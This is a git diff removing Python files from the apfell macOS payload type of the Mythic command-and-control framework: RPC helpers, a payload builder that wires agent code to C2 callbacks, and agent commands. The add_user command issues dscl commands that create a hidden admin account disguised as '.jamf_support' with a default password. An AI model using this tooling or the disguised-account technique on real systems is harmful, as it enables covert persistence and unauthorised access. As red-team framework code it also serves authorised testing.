@abstractmethod - def description(self): - pass - - @property - @abstractmethod - def version(self): - pass - - @property - @abstractmethod - def is_exit(self): - pass - - @property - @abstractmethod - def is_file_browse(self): - pass - - @property - @abstractmethod - def is_process_list(self): - pass - - @property - @abstractmethod - def is_download_file(self): - pass - - @property - @abstractmethod - def is_remove_file(self): - pass - - @property - @abstractmethod - def is_upload_file(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def argument_class(self): - pass - - @property - @abstractmethod - def attackmapping(self): - pass - - @property - def browser_script(self): - pass - - @abstractmethod - async def create_tasking(self, task: MythicTask) -> MythicTask: - pass - - @abstractmethod - async def process_response(self, response: AgentResponse): - pass - - def to_json(self): - params = self.argument_class("").to_json() - if self.browser_script is not None: - bscript = {"browser_script": self.browser_script.to_json(self.base_path)} - else: - bscript = {} - return { - "cmd": self.cmd, - "needs_admin": self.needs_admin, - "help_cmd": self.help_cmd, - "description": self.description, - "version": self.version, - "is_exit": self.is_exit, - "is_file_browse": self.is_file_browse, - "is_process_list": self.is_process_list, - "is_download_file": self.is_download_file, - "is_remove_file": self.is_remove_file, - "is_upload_file": self.is_upload_file, - "author": self.author, - "attack": [{"t_num": a} for a in self.attackmapping], - "parameters": params, - **bscript, - } diff --git a/Payload_Types/apfell/mythic/MythicBaseRPC.py b/Payload_Types/apfell/mythic/MythicBaseRPC.py deleted file mode 100644 index df92fe802..000000000 --- a/Payload_Types/apfell/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,95 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -from CommandBase import * -import json - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self, task: MythicTask): - self.task_id = task.task_id - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/Payload_Types/apfell/mythic/MythicC2RPC.py b/Payload_Types/apfell/mythic/MythicC2RPC.py deleted file mode 100644 index c43be2875..000000000 --- a/Payload_Types/apfell/mythic/MythicC2RPC.py +++ /dev/null @@ -1,29 +0,0 @@ -from MythicBaseRPC import * - - -class MythicC2RPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicC2RPC(MythicBaseRPC): - async def call_c2_func( - self, c2_profile: str, function_name: str, message: str - ) -> MythicC2RPCResponse: - resp = await self.call( - {"action": function_name, "message": message, "task_id": self.task_id}, - c2_profile, - ) - return MythicC2RPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicCryptoRPC.py b/Payload_Types/apfell/mythic/MythicCryptoRPC.py deleted file mode 100644 index 6a7673d17..000000000 --- a/Payload_Types/apfell/mythic/MythicCryptoRPC.py +++ /dev/null @@ -1,47 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicCryptoRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response["data"] - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCryptoRPC(MythicBaseRPC): - async def encrypt_bytes( - self, data: bytes, with_uuid: bool = False - ) -> MythicCryptoRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "task_id": self.task_id, - "with_uuid": with_uuid, - } - ) - return MythicCryptoRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, with_uuid: bool = False - ) -> MythicCryptoRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "task_id": self.task_id, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicCryptoRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicFileRPC.py b/Payload_Types/apfell/mythic/MythicFileRPC.py deleted file mode 100644 index 77388965e..000000000 --- a/Payload_Types/apfell/mythic/MythicFileRPC.py +++ /dev/null @@ -1,172 +0,0 @@ -from MythicBaseRPC import * -import base64 -import uuid - - -class MythicFileRPCResponse(RPCResponse): - def __init__(self, file: RPCResponse): - super().__init__(file._raw_resp) - if file.status == MythicStatus.Success: - self.agent_file_id = file.response["agent_file_id"] - self.task = file.response["task"] - self.timestamp = file.response["timestamp"] - self.deleted = file.response["deleted"] - self.operator = file.response["operator"] - self.delete_after_fetch = file.response["delete_after_fetch"] - self.filename = file.response["filename"] - self.md5 = file.response["md5"] - self.sha1 = file.response["sha1"] - self.chunks_received = file.response["chunks_received"] - self.total_chunks = file.response["total_chunks"] - if "contents" in file.response: - self.contents = base64.b64decode(file.response["contents"]) - else: - self.contents = None - else: - self.agent_file_id = None - self.task = None - self.timestamp = None - self.deleted = None - self.operator = None - self.delete_after_fetch = None - self.filename = None - self.md5 = None - self.sha1 = None - self.chunks_received = None - self.total_chunks = None - self.contents = None - - @property - def agent_file_id(self): - return self._agent_file_id - - @agent_file_id.setter - def agent_file_id(self, agent_file_id): - self._agent_file_id = agent_file_id - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - self._task = task - - @property - def timestamp(self): - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - self._operator = operator - - @property - def delete_after_fetch(self): - return self._delete_after_fetch - - @delete_after_fetch.setter - def delete_after_fetch(self, delete_after_fetch): - self._delete_after_fetch = delete_after_fetch - - @property - def filename(self): - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - @property - def md5(self): - return self._md5 - - @md5.setter - def md5(self, md5): - self._md5 = md5 - - @property - def sha1(self): - return self._sha1 - - @sha1.setter - def sha1(self, sha1): - self._sha1 = sha1 - - @property - def chunks_received(self): - return self._chunks_received - - @chunks_received.setter - def chunks_received(self, chunks_received): - self._chunks_received = chunks_received - - @property - def total_chunks(self): - return self._total_chunks - - @total_chunks.setter - def total_chunks(self, total_chunks): - self._total_chunks = total_chunks - - @property - def contents(self): - return self._contents - - @contents.setter - def contents(self, contents): - self._contents = contents - - -class MythicFileRPC(MythicBaseRPC): - async def register_file( - self, - file: bytes, - delete_after_fetch: bool = None, - saved_file_name: str = None, - remote_path: str = None, - is_screenshot: bool = None, - is_download: bool = None, - ) -> MythicFileRPCResponse: - resp = await self.call( - { - "action": "register_file", - "file": base64.b64encode(file).decode(), - "delete_after_fetch": delete_after_fetch - if delete_after_fetch is not None - else True, - "saved_file_name": saved_file_name - if saved_file_name is not None - else str(uuid.uuid4()), - "task_id": self.task_id, - "remote_path": remote_path if remote_path is not None else "", - "is_screenshot": is_screenshot if is_screenshot is not None else False, - "is_download": is_download if is_download is not None else False, - } - ) - return MythicFileRPCResponse(resp) - - async def get_file_by_name(self, filename: str) -> MythicFileRPCResponse: - resp = await self.call( - { - "action": "get_file_by_name", - "task_id": self.task_id, - "filename": filename, - } - ) - return MythicFileRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicPayloadRPC.py b/Payload_Types/apfell/mythic/MythicPayloadRPC.py deleted file mode 100644 index 2af8bb3a1..000000000 --- a/Payload_Types/apfell/mythic/MythicPayloadRPC.py +++ /dev/null @@ -1,303 +0,0 @@ -from MythicBaseRPC import * -import base64 -import pathlib - - -class MythicPayloadRPCResponse(RPCResponse): - def __init__(self, payload: RPCResponse): - super().__init__(payload._raw_resp) - if payload.status == MythicStatus.Success: - self.uuid = payload.response["uuid"] - self.tag = payload.response["tag"] - self.operator = payload.response["operator"] - self.creation_time = payload.response["creation_time"] - self.payload_type = payload.response["payload_type"] - self.operation = payload.response["operation"] - self.wrapped_payload = payload.response["wrapped_payload"] - self.deleted = payload.response["deleted"] - self.auto_generated = payload.response["auto_generated"] - self.task = payload.response["task"] - if "contents" in payload.response: - self.contents = payload.response["contents"] - self.build_phase = payload.response["build_phase"] - self.agent_file_id = payload.response["file_id"]["agent_file_id"] - self.filename = payload.response["file_id"]["filename"] - self.c2info = payload.response["c2info"] - self.commands = payload.response["commands"] - self.build_parameters = payload.response["build_parameters"] - else: - self.uuid = None - self.tag = None - self.operator = None - self.creation_time = None - self.payload_type = None - self.operation = None - self.wrapped_payload = None - self.deleted = None - self.auto_generated = None - self.task = None - self.contents = None - self.build_phase = None - self.agent_file_id = None - self.filename = None - self.c2info = None - self.commands = None - self.build_parameters = None - - @property - def uuid(self): - return self._uuid - - @uuid.setter - def uuid(self, uuid): - self._uuid = uuid - - @property - def tag(self): - return self._tag - - @tag.setter - def tag(self, tag): - self._tag = tag - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - self._operator = operator - - @property - def creation_time(self): - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def payload_type(self): - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - self._payload_type = payload_type - - @property - def location(self): - return self._location - - @property - def operation(self): - return self._operation - - @operation.setter - def operation(self, operation): - self._operation = operation - - @property - def wrapped_payload(self): - return self._wrapped_payload - - @wrapped_payload.setter - def wrapped_payload(self, wrapped_payload): - self._wrapped_payload = wrapped_payload - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def auto_generated(self): - return self._auto_generated - - @auto_generated.setter - def auto_generated(self, auto_generated): - self._auto_generated = auto_generated - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - self._task = task - - @property - def contents(self): - return self._contents - - @contents.setter - def contents(self, contents): - try: - self._contents = base64.b64decode(contents) - except: - self._contents = contents - - @property - def build_phase(self): - return self._build_phase - - @build_phase.setter - def build_phase(self, build_phase): - self._build_phase = build_phase - - @property - def c2info(self): - return self._c2info - - @c2info.setter - def c2info(self, c2info): - self._c2info = c2info - - @property - def build_parameters(self): - return self._build_parameters - - @build_parameters.setter - def build_parameters(self, build_parameters): - self._build_parameters = build_parameters - - def set_profile_parameter_value(self, - c2_profile: str, - parameter_name: str, - value: any): - if self.c2info is None: - raise Exception("Can't set value when c2 info is None") - for c2 in self.c2info: - if c2["name"] == c2_profile: - c2["parameters"][parameter_name] = value - return - raise Exception("Failed to find c2 name") - - def set_build_parameter_value(self, - parameter_name: str, - value: any): - if self.build_parameters is None: - raise Exception("Can't set value when build parameters are None") - for param in self.build_parameters: - if param["name"] == parameter_name: - param["value"] = value - return - self.build_parameters.append({"name": parameter_name, "value": value}) - - -class MythicPayloadRPC(MythicBaseRPC): - async def get_payload_by_uuid(self, uuid: str) -> MythicPayloadRPCResponse: - resp = await self.call( - {"action": "get_payload_by_uuid", "uuid": uuid, "task_id": self.task_id} - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_template( - self, - uuid: str, - destination_host: str = None, - wrapped_payload: str = None, - description: str = None, - ) -> MythicPayloadRPCResponse: - resp = await self.call( - { - "action": "build_payload_from_template", - "uuid": uuid, - "task_id": self.task_id, - "destination_host": destination_host, - "wrapped_payload": wrapped_payload, - "description": description, - } - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_parameters(self, - payload_type: str, - c2_profiles: list, - commands: list, - build_parameters: list, - filename: str = None, - tag: str = None, - destination_host: str = None, - wrapped_payload: str = None) -> MythicPayloadRPCResponse: - """ - :param payload_type: String value of a payload type name - :param c2_profiles: List of c2 dictionaries of the form: - { "c2_profile": "HTTP", - "c2_profile_parameters": { - "callback_host": "https://domain.com", - "callback_interval": 20 - } - } - :param filename: String value of the name of the resulting payload - :param tag: Description for the payload for the active callbacks page - :param commands: List of string names for the commands that should be included - :param build_parameters: List of build parameter dictionaries of the form: - { - "name": "version", "value": 4.0 - } - :param destination_host: String name of the host where the payload will go - :param wrapped_payload: If payload_type is a wrapper, wrapped payload UUID - :return: - """ - resp = await self.call( - { - "action": "build_payload_from_parameters", - "task_id": self.task_id, - "payload_type": payload_type, - "c2_profiles": c2_profiles, - "filename": filename, - "tag": tag, - "commands": commands, - "build_parameters": build_parameters, - "destination_host": destination_host, - "wrapped_payload": wrapped_payload - } - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_MythicPayloadRPCResponse(self, - resp: MythicPayloadRPCResponse, - destination_host: str = None) -> MythicPayloadRPCResponse: - c2_list = [] - for c2 in resp.c2info: - c2_list.append({ - "c2_profile": c2["name"], - "c2_profile_parameters": c2["parameters"] - }) - resp = await self.call( - { - "action": "build_payload_from_parameters", - "task_id": self.task_id, - "payload_type": resp.payload_type, - "c2_profiles": c2_list, - "filename": resp.filename, - "tag": resp.tag, - "commands": resp.commands, - "build_parameters": resp.build_parameters, - "destination_host": destination_host, - "wrapped_payload": resp.wrapped_payload - } - ) - return MythicPayloadRPCResponse(resp) - - async def register_payload_on_host(self, - uuid: str, - host: str): - """ - Register a payload on a host for linking purposes - :param uuid: - :param host: - :return: - """ - resp = await self.call( - { - "action": "register_payload_on_host", - "task_id": self.task_id, - "uuid": uuid, - "host": host - } - ) - return MythicPayloadRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicResponseRPC.py b/Payload_Types/apfell/mythic/MythicResponseRPC.py deleted file mode 100644 index 8ae588a96..000000000 --- a/Payload_Types/apfell/mythic/MythicResponseRPC.py +++ /dev/null @@ -1,43 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicResponseRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - - -class MythicResponseRPC(MythicBaseRPC): - async def user_output(self, user_output: str) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "user_output", - "user_output": user_output, - "task_id": self.task_id, - } - ) - return MythicResponseRPCResponse(resp) - - async def update_callback(self, callback_info: dict) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "update_callback", - "callback_info": callback_info, - "task_id": self.task_id, - } - ) - return MythicResponseRPCResponse(resp) - - async def register_artifact( - self, artifact_instance: str, artifact_type: str, host: str = None - ) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "register_artifact", - "task_id": self.task_id, - "host": host, - "artifact_instance": artifact_instance, - "artifact": artifact_type, - } - ) - return MythicResponseRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicSocksRPC.py b/Payload_Types/apfell/mythic/MythicSocksRPC.py deleted file mode 100644 index 3a1b63df6..000000000 --- a/Payload_Types/apfell/mythic/MythicSocksRPC.py +++ /dev/null @@ -1,29 +0,0 @@ -from MythicBaseRPC import * - - -class MythicSocksRPCResponse(RPCResponse): - def __init__(self, socks: RPCResponse): - super().__init__(socks._raw_resp) - - -class MythicSocksRPC(MythicBaseRPC): - async def start_socks(self, port: int) -> MythicSocksRPCResponse: - resp = await self.call( - { - "action": "control_socks", - "task_id": self.task_id, - "start": True, - "port": port, - } - ) - return MythicSocksRPCResponse(resp) - - async def stop_socks(self) -> MythicSocksRPCResponse: - resp = await self.call( - { - "action": "control_socks", - "stop": True, - "task_id": self.task_id, - } - ) - return MythicSocksRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/PayloadBuilder.py b/Payload_Types/apfell/mythic/PayloadBuilder.py deleted file mode 100644 index 6333bdbff..000000000 --- a/Payload_Types/apfell/mythic/PayloadBuilder.py +++ /dev/null @@ -1,302 +0,0 @@ -from enum import Enum -from abc import abstractmethod -from pathlib import Path -import base64 -from CommandBase import * - - -class BuildStatus(Enum): - Success = "success" - Error = "error" - - -class SupportedOS(Enum): - Windows = "Windows" - MacOS = "macOS" - Linux = "Linux" - WebShell = "WebShell" - Chrome = "Chrome" - - -class BuildParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - - -class BuildParameter: - def __init__( - self, - name: str, - parameter_type: BuildParameterType = None, - description: str = None, - required: bool = None, - verifier_regex: str = None, - default_value: str = None, - choices: [str] = None, - value: any = None, - verifier_func: callable = None, - ): - self.name = name - self.verifier_func = verifier_func - self.parameter_type = ( - parameter_type if parameter_type is not None else ParameterType.String - ) - self.description = description if description is not None else "" - self.required = required if required is not None else True - self.verifier_regex = verifier_regex if verifier_regex is not None else "" - self.default_value = default_value - if value is None: - self.value = default_value - else: - self.value = value - self.choices = choices - - @property - def name(self): - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def parameter_type(self): - return self._parameter_type - - @parameter_type.setter - def parameter_type(self, parameter_type): - self._parameter_type = parameter_type - - @property - def description(self): - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def required(self): - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def verifier_regex(self): - return self._verifier_regex - - @verifier_regex.setter - def verifier_regex(self, verifier_regex): - self._verifier_regex = verifier_regex - - @property - def default_value(self): - return self._default_value - - @default_value.setter - def default_value(self, default_value): - self._default_value = default_value - - @property - def value(self): - return self._value - - @value.setter - def value(self, value): - if value is None: - self._value = value - else: - if self.verifier_func is not None: - self.verifier_func(value) - self._value = value - else: - self._value = value - - def to_json(self): - return { - "name": self._name, - "parameter_type": self._parameter_type.value, - "description": self._description, - "required": self._required, - "verifier_regex": self._verifier_regex, - "parameter": self._default_value - if self._parameter_type == BuildParameterType.String - else "\n".join(self.choices), - } - - -class C2ProfileParameters: - def __init__(self, c2profile: dict, parameters: dict = None): - self.parameters = {} - self.c2profile = c2profile - if parameters is not None: - self.parameters = parameters - - def get_parameters_dict(self): - return self.parameters - - def get_c2profile(self): - return self.c2profile - - -class CommandList: - def __init__(self, commands: [str] = None): - self.commands = [] - if commands is not None: - self.commands = commands - - def get_commands(self) -> [str]: - return self.commands - - def remove_command(self, command: str): - self.commands.remove(command) - - def add_command(self, command: str): - for c in self.commands: - if c == command: - return - self.commands.append(command) - - def clear(self): - self.commands = [] - - -class BuildResponse: - def __init__(self, status: BuildStatus, payload: bytes = None, message: str = None): - self.status = status - self.payload = payload if payload is not None else b"" - self.message = message if message is not None else "" - - def get_status(self) -> BuildStatus: - return self.status - - def set_status(self, status: BuildStatus): - self.status = status - - def get_payload(self) -> bytes: - return self.payload - - def set_payload(self, payload: bytes): - self.payload = payload - - def set_message(self, message: str): - self.message = message - - def get_message(self) -> str: - return self.message - - -class PayloadType: - - support_browser_scripts = [] - - def __init__( - self, - uuid: str = None, - agent_code_path: Path = None, - c2info: [C2ProfileParameters] = None, - commands: CommandList = None, - wrapped_payload: str = None, - ): - self.commands = commands - self.base_path = agent_code_path - self.agent_code_path = agent_code_path / "agent_code" - self.c2info = c2info - self.uuid = uuid - self.wrapped_payload = wrapped_payload - - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def file_extension(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def supported_os(self): - pass - - @property - @abstractmethod - def wrapper(self): - pass - - @property - @abstractmethod - def wrapped_payloads(self): - pass - - @property - @abstractmethod - def note(self): - pass - - @property - @abstractmethod - def supports_dynamic_loading(self): - pass - - @property - @abstractmethod - def c2_profiles(self): - pass - - @property - @abstractmethod - def build_parameters(self): - pass - - @abstractmethod - async def build(self) -> BuildResponse: - pass - - def get_parameter(self, key): - if key in self.build_parameters: - return self.build_parameters[key].value - else: - return None - - async def set_and_validate_build_parameters(self, buildinfo: dict): - # set values for all of the key-value pairs presented to us - for key, bp in self.build_parameters.items(): - if key in buildinfo and buildinfo[key] is not None: - bp.value = buildinfo[key] - if bp.required and bp.value is None: - raise ValueError( - "{} is a required parameter but has no value".format(key) - ) - - def get_build_instance_values(self): - values = {} - for key, bp in self.build_parameters.items(): - if bp.value is not None: - values[key] = bp.value - return values - - def to_json(self): - return { - "ptype": self.name, - "file_extension": self.file_extension, - "author": self.author, - "supported_os": ",".join([x.value for x in self.supported_os]), - "wrapper": self.wrapper, - "wrapped": self.wrapped_payloads, - "supports_dynamic_loading": self.supports_dynamic_loading, - "note": self.note, - "build_parameters": [b.to_json() for k, b in self.build_parameters.items()], - "c2_profiles": self.c2_profiles, - "support_scripts": [ - a.to_json(self.base_path) for a in self.support_browser_scripts - ], - } diff --git a/Payload_Types/apfell/mythic/__init__.py b/Payload_Types/apfell/mythic/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/Payload_Types/apfell/mythic/agent_functions/__init__.py b/Payload_Types/apfell/mythic/agent_functions/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/Payload_Types/apfell/mythic/agent_functions/add_user.py b/Payload_Types/apfell/mythic/agent_functions/add_user.py deleted file mode 100644 index 18a14096f..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/add_user.py +++ /dev/null @@ -1,190 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class AddUserArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "password": CommandParameter( - name="password", - type=ParameterType.String, - description="p@55w0rd_here for new user", - required=False, - default_value="p@55w0rd_here", - ), - "passwd": CommandParameter( - name="passwd", - type=ParameterType.Credential_Value, - description="password of the user that will execute the commands", - ), - "user": CommandParameter( - name="user", - type=ParameterType.Credential_Account, - description="username that will execute the commands", - ), - "createprofile": CommandParameter( - name="createprofile", - type=ParameterType.Boolean, - required=False, - default_value=False, - description="create a user profile or not", - ), - "usershell": CommandParameter( - name="usershell", - type=ParameterType.String, - description="which shell environment should the new user have", - required=False, - default_value="/bin/bash", - ), - "primarygroupid": CommandParameter( - name="primarygroupid", - type=ParameterType.Number, - required=False, - description="POSIX primary group id for the new account", - default_value=80, - ), - "uniqueid": CommandParameter( - name="uniqueid", - type=ParameterType.Number, - required=False, - default_value=403, - description="POSIX unique id for the user", - ), - "homedir": CommandParameter( - name="homedir", - type=ParameterType.String, - required=False, - description="/Users/.jamf_support", - ), - "realname": CommandParameter( - name="realname", - type=ParameterType.String, - required=False, - default_value="Jamf Support User", - description="Full user name", - ), - "username": CommandParameter( - name="username", - type=ParameterType.String, - required=False, - default_value=".jamf_support", - description="POSIX username for account", - ), - "hidden": CommandParameter( - name="hidden", - type=ParameterType.Boolean, - required=False, - default_value=False, - description="Should the account be hidden from the logon screen", - ), - "admin": CommandParameter( - name="admin", - type=ParameterType.Boolean, - required=False, - default_value=True, - description="Should the account be an admin account", - ), - } - - async def parse_arguments(self): - self.load_args_from_json_string(self.command_line) - - -class AddUserCommand(CommandBase): - cmd = "add_user" - needs_admin = True - help_cmd = "add_user" - description = "Add a local user to the system by wrapping the Apple binary, dscl." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - argument_class = AddUserArguments - attackmapping = ["T1136", "T1169"] - - async def create_tasking(self, task: MythicTask) -> MythicTask: - if task.args.get_arg("hidden"): - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} IsHidden 1".format(task.args.get_arg("user")), - artifact_type="Process Create", - ) - else: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{}".format(task.args.get_arg("user")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} UniqueID {}".format( - task.args.get_arg("user"), - task.args.get_arg("uniqueid") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} PrimaryGroupID {}".format( - task.args.get_arg("user"), - task.args.get_arg("primarygroupid") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} NFSHomeDirectory \"{}\"".format( - task.args.get_arg("user"), - task.args.get_arg("homedir") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} RealName \"{}\"".format( - task.args.get_arg("user"), - task.args.get_arg("realname") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} UserShell {}".format( - task.args.get_arg("user"), - task.args.get_arg("usershell") - ), - artifact_type="Process Create", - ) - if task.args.get_arg("admin"): - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dseditgroup -o edit -a {} -t user admin".format(task.args.get_arg("user")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . passwd /Users/{} \"{}\"".format( - task.args.get_arg("user"), - task.args.get_arg("password") - ), - artifact_type="Process Create", - ) - if task.args.get_arg("createprofile"): - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="mkdir \"{}\"".format(task.args.get_arg("homedir")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="cp -R \"/System/Library/User Template/English.lproj/\" \"{}\"".format( - task.args.get_arg("homedir") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="chown -R {}:staff \"{}\"".format( - task.args.get_arg("user"), - task.args.get_arg("homedir") - ), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/builder.py b/Payload_Types/apfell/mythic/agent_functions/builder.py deleted file mode 100644 index 94f98d266..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/builder.py +++ /dev/null @@ -1,59 +0,0 @@ -from PayloadBuilder import * - - -class Apfell(PayloadType): - - name = "apfell" - file_extension = "js" - author = "@its_a_feature_" - supported_os = [SupportedOS.MacOS] - wrapper = False - wrapped_payloads = [] - note = """This payload uses JavaScript for Automation (JXA) for execution on macOS boxes.""" - supports_dynamic_loading = True - build_parameters = {} - c2_profiles = ["HTTP", "dynamicHTTP"] - support_browser_scripts = [ - BrowserScript(script_name="create_table", author="@its_a_feature_") - ] - - async def build(self) -> BuildResponse: - # this function gets called to create an instance of your payload - resp = BuildResponse(status=BuildStatus.Success) - # create the payload - try: - command_code = "" - for cmd in self.commands.get_commands(): - command_code += ( - open(self.agent_code_path / "{}.js".format(cmd), "r").read() + "\n" - ) - base_code = open( - self.agent_code_path / "base" / "apfell-jxa.js", "r" - ).read() - base_code = base_code.replace("UUID_HERE", self.uuid) - base_code = base_code.replace("COMMANDS_HERE", command_code) - all_c2_code = "" - if len(self.c2info) != 1: - resp.set_status(BuildStatus.Error) - resp.set_message( - "Error building payload - apfell only supports one c2 profile at a time." - ) - return resp - for c2 in self.c2info: - profile = c2.get_c2profile() - c2_code = open( - self.agent_code_path - / "c2_profiles" - / "{}.js".format(profile["name"]), - "r", - ).read() - for key, val in c2.get_parameters_dict().items(): - c2_code = c2_code.replace(key, val) - all_c2_code += c2_code - base_code = base_code.replace("C2PROFILE_HERE", all_c2_code) - resp.payload = base_code.encode() - resp.message = "Successfully built!" - except Exception as e: - resp.set_status(BuildStatus.Error) - resp.set_message("Error building payload: " + str(e)) - return resp diff --git a/Payload_Types/apfell/mythic/agent_functions/cat.py b/Payload_Types/apfell/mythic/agent_functions/cat.py deleted file mode 100644 index e59bfe91b..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/cat.py +++ /dev/null @@ -1,51 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class CatArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="path to file (no quotes required)", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("path", self.command_line) - else: - raise ValueError("Missing arguments") - - -class CatCommand(CommandBase): - cmd = "cat" - needs_admin = False - help_cmd = "cat /path/to/file" - description = "Read the contents of a file and display it to the user. No need for quotes and relative paths are fine" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - argument_class = CatArguments - attackmapping = ["T1081", "T1106"] - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSString.stringWithContentsOfFileEncodingError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/cd.py b/Payload_Types/apfell/mythic/agent_functions/cd.py deleted file mode 100644 index 83dffe896..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/cd.py +++ /dev/null @@ -1,51 +0,0 @@ -from CommandBase import * -import json 